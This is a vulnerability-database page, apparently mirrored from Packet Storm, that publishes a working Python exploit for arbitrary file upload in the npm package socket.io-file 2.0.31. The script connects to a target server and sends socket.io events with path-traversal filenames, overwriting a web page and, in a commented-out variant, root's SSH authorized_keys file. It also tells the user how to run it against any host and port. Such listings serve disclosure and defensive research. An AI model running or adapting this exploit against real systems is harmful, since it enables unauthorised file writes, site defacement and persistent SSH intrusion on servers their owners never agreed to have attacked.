Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Socket.io-file 2.0.31 Arbitrary File Upload

🗓️ 27 Jul 2020 00:00:00Reported by Cr0wTomType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 460 Views

Socket.io-file 2.0.31 Arbitrary File Upload. Improper Input Validation in File Upload Functionality. Exploited by Cr0wTo

Code
`# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload  
# Date: 2020-07-02  
# Exploit Author: Cr0wTom  
# Vendor Homepage: https://www.npmjs.com/package/socket.io-file  
# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31  
# Version: <= v2.0.31  
# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0  
# CVE: -  
  
# Requirements: pip install socketIO-client-nexus==0.7.6  
  
#!/usr/bin/env python  
  
import sys  
import json  
import os  
from socketIO_client_nexus import SocketIO, LoggingNamespace  
  
def file_creation(RHOST, RPORT):  
print ('Initiating connection...')  
with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:  
  
print ('Creating file...')  
  
# Example server running in /home/testuser/Documents/socket-app so customize the path appropriately   
# Change the "name" option if you want to create an other file in an different path of the system  
socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})  
  
# Example for server running with root access:  
# socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})  
  
print ('Writing data to file...')  
  
# Add the data you want to get written to the file  
data = "Exploited by Cr0wTom"  
json_string = json.dumps(data)  
socketIO.once("socket.io-file::request::u_0", on_aaa_response)  
socketIO.emit("socket.io-file::stream::u_0", json_string)  
  
def on_aaa_response(*args):  
print('on_aaa_response', args)  
  
def print_usage():  
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')  
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')  
print ('Usage: python3 exploit.py <RHOST> <RPORT>')  
print ('RHOST The target host IP address or domain.')  
print ('RPORT The target host port number of the nodejs server.')  
  
if __name__ == '__main__':  
  
# ensure we have at least an IP and Port  
if len(sys.argv) < 3:  
print_usage()  
sys.exit(1)  
  
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')  
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')  
file_creation(sys.argv[1], sys.argv[2])  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jul 2020 00:00Current
socket.io-filearbitrary file uploadimproper input validation
460